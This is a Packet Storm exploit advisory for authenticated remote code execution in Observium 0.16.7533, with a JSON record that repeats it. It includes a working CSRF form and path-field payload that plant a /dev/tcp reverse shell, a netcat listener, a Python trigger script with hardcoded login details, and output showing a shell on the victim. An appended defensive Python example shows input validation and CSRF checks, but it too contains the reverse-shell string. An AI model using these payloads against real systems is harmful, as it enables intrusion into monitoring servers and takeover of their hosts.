ID PACKETSTORM:136859
Type packetstorm
Reporter Dolev Farhi
Modified 2016-04-30T00:00:00
Description
# Exploit title: Observium Commercial - Authenticated RCE
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com
# Date: 28-04-2016
# Vendor homepage: http://observium.org/
# Software version: CE 0.16.7533
Authenticated remote code execution

Either via CSRF or by editing the whois binary field directly in the Observium web UI under Settings -> System Path, an attacker can change the Path of any of [whois, mtr, nmap] to an arbitrary bash command. Hitting the URL http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 as any Observium user (even a low-privileged one) then triggers the code execution. For example, set up a listener:
root@pt:~# nc -lvp 4444
listening on [any] 4444 ...
and use a CSRF page that looks like this:
<html>
<body>
<div align="center">
<h2><b>CSRF</b></h2>
<form action="http://<observiumIP>/settings/section=paths/" method="POST">
<input type="hidden" name="temp_dir" value="" />
<input type="hidden" name="varset_temp_dir" value="" />
<input type="hidden" name="varset_rrdtool" value="" />
<input type="hidden" name="fping" value="" />
<input type="hidden" name="varset_fping" value="" />
<input type="hidden" name="fping6" value="" />
<input type="hidden" name="varset_fping6" value="" />
<input type="hidden" name="svn" value="" />
<input type="hidden" name="varset_svn" value="" />
<input type="hidden" name="snmpget" value="" />
<input type="hidden" name="varset_snmpget" value="" />
<input type="hidden" name="snmpwalk" value="" />
<input type="hidden" name="varset_snmpwalk" value="" />
<input type="hidden" name="snmpbulkget" value="" />
<input type="hidden" name="varset_snmpbulkget" value="" />
<input type="hidden" name="snmpbulkwalk" value="" />
<input type="hidden" name="varset_snmpbulkwalk" value="" />
<input type="hidden" name="snmptranslate" value="" />
<input type="hidden" name="varset_snmptranslate" value="" />
<input type="hidden" name="ipmitool" value="" />
<input type="hidden" name="varset_ipmitool" value="" />
<input type="hidden" name="virsh" value="" />
<input type="hidden" name="varset_virsh" value="" />
<input type="hidden" name="wmic" value="" />
<input type="hidden" name="varset_wmic" value="" />
<input type="hidden" name="git" value="" />
<input type="hidden" name="varset_git" value="" />
<input type="hidden" name="whois" value="bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit" />
<input type="hidden" name="varset_whois" value="" />
<input type="hidden" name="whois_custom" value="1" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="varset_file" value="" />
<input type="hidden" name="dot" value="" />
<input type="hidden" name="varset_dot" value="" />
<input type="submit" name="submit" value="save" />
</form>
</div>
</body>
</html>
Alternatively, set the Path field for the 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visit http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8; this runs the command stored in the whois parameter and returns a reverse shell on the machine.

The following Python can be used to trigger it instead:
"""
import sys
import urllib
import urllib2
import cookielib
#!/usr/bin/python
username = 'test'
password = '123456'
timeout = 10
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''})
opener.open('http://observium-server', login_data, timeout=timeout)
url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8'
resp = opener.open(url)
except Exception, e:
print e
sys.exit(1)
"""
listening on [any] 4444 ...
192.168.2.155: inverse host lookup failed: Unknown host
connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413
bash: no job control in this shell
bash: /root/.bashrc: Permission denied
bash-4.1$ ls -l /opt
ls -l /opt
total 48944
drwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium
-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz
drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh
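As an added defender-side example (not Observium's code and not part of the advisory), the following Python shows the controls whose absence the advisory relies on: the tool name requested through a netcmd-style endpoint is allowlisted, the configured tool path is accepted only as a plain absolute path and is executed without a shell, the query is restricted to an IP address or hostname, and a per-session CSRF token is compared in constant time before a settings form is honoured. The settings dict, the function names and the ALLOWED_CMDS set are assumptions for illustration.

```python
"""Hardened handling of a settings-supplied binary path (generic illustration, not Observium's code)."""
import hmac
import ipaddress
import re
import subprocess

# Only these tool names may be invoked through the endpoint; anything else is refused.
ALLOWED_CMDS = {"whois", "mtr", "nmap"}

# A plain absolute path: no spaces, shell metacharacters or redirection operators.
_SAFE_PATH = re.compile(r"^/(?:[A-Za-z0-9._-]+/)*[A-Za-z0-9._-]+$")

# RFC 1123 style hostname labels; the whole name is limited to 253 characters.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def validate_binary_path(path):
    """Accept only a plain absolute path, so a command string stored in the setting is rejected."""
    return bool(_SAFE_PATH.match(path))


def validate_query(query):
    """The query must be an IP address or a hostname; nothing else reaches the child process."""
    try:
        ipaddress.ip_address(query)
        return True
    except ValueError:
        return bool(_HOSTNAME.match(query))


def build_argv(cmd, query, settings):
    """Return the argv list for the request, or raise ValueError for anything that fails a check."""
    if cmd not in ALLOWED_CMDS:
        raise ValueError("command not allowed: %r" % cmd)
    path = settings.get(cmd, "")
    if not validate_binary_path(path):
        raise ValueError("configured path for %s is not a plain binary path" % cmd)
    if not validate_query(query):
        raise ValueError("query is not an IP address or hostname")
    return [path, query]


def run_netcmd(cmd, query, settings, timeout=10):
    """Execute via an argv list, never a shell, so the stored string is not parsed as a command line."""
    argv = build_argv(cmd, query, settings)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False).stdout


def csrf_token_valid(session_token, form_token):
    """Constant-time comparison of the per-session token against the token submitted with the form."""
    return bool(session_token) and hmac.compare_digest(session_token, form_token or "")


if __name__ == "__main__":
    # Constructed settings: one sane entry and one carrying the advisory's reverse-shell payload.
    settings = {
        "whois": "/usr/bin/whois",
        "mtr": "bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit",
    }
    print(build_argv("whois", "8.8.8.8", settings))
    for bad_cmd in ("mtr", "bash"):
        try:
            build_argv(bad_cmd, "8.8.8.8", settings)
        except ValueError as exc:
            print("rejected:", exc)
```

The path check is deliberately stricter than "does the file exist": a value such as the advisory's payload contains spaces and redirections and is refused before anything is executed, and because the child process receives an argv list rather than a shell string, even a path that slipped through could not chain further commands. The CSRF token check belongs on the settings form handler itself; the netcmd endpoint gains nothing from it once the stored path has already been replaced.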
{"id": "PACKETSTORM:136859", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Observium 0.16.7533 Code Execution / Cross Site Request Forgery", "description": "", "published": "2016-04-30T00:00:00", "modified": "2016-04-30T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/136859/Observium-0.16.7533-Code-Execution-Cross-Site-Request-Forgery.html", "reporter": "Dolev Farhi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:27", "viewCount": 4, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:22:27", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:27", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/136859/observium0167533-execxsrf.txt", "sourceData": "`# Exploit title: Observium Commercial - Authenticated RCE \n# Author: Dolev Farhi \n# Contact: dolevf at protonmail.com \n# Date: 28-04-2016 \n# Vendor homepage: http://observium.org/ \n# Software version: CE 0.16.7533 \n \nAuthenticated remote code execution \nUsing either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 \nusing any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener \n \nroot@pt:~# nc -lvp 4444 \nlistening on [any] 4444 ... 
\n \nand a CSRF which looks like this: \n \n<!-- \n<html> \n<div align=\"center\"> \n<pre> \n \n<h2><b>CSRF<b></h2> \n<body> \n<form \naction=\"http://<observiumIP>/settings/section=paths/\" \nmethod=\"POST\"> \n<input type=\"hidden\" name=\"temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_rrdtool\" value=\"\" /> \n<input type=\"hidden\" name=\"fping\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping\" value=\"\" /> \n<input type=\"hidden\" name=\"fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"svn\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_svn\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"git\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_git\" value=\"\" /> \n<input type=\"hidden\" name=\"whois\" value=\"bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit\" /> \n<input type=\"hidden\" name=\"varset_whois\" value=\"\" /> \n<input 
type=\"hidden\" name=\"whois_custom\" value=\"1\" /> \n<input type=\"hidden\" name=\"file\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_file\" value=\"\" /> \n<input type=\"hidden\" name=\"dot\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_dot\" value=\"\" /> \n<input type=\"submit\" name=\"submit\" value=\"save\" /> \n</form> \n</body> \n</div> \n</html> \n \nor by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the \nwhois parameter which gives us a reverse shell on the machine: \n \nyou may also use the following python instead: \n \n\"\"\" \nimport sys \nimport urllib \nimport urllib2 \nimport cookielib \n \n#!/usr/bin/python \nusername = 'test' \npassword = '123456' \ntimeout = 10 \n \ntry: \ncj = cookielib.CookieJar() \nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) \nlogin_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''}) \nopener.open('http://observium-server', login_data, timeout=timeout) \nurl = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8' \nresp = opener.open(url) \n \nexcept Exception, e: \nprint e \nsys.exit(1) \n\"\"\" \n \nlistening on [any] 4444 ... \n192.168.2.155: inverse host lookup failed: Unknown host \nconnect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413 \nbash: no job control in this shell \nbash: /root/.bashrc: Permission denied \nbash-4.1$ ls -l /opt \nls -l /opt \ntotal 48944 \ndrwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium \n-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz \ndrwxr-xr-x. 2 root root 4096 Mar 26 2015 rh \n \n`\n"}
{}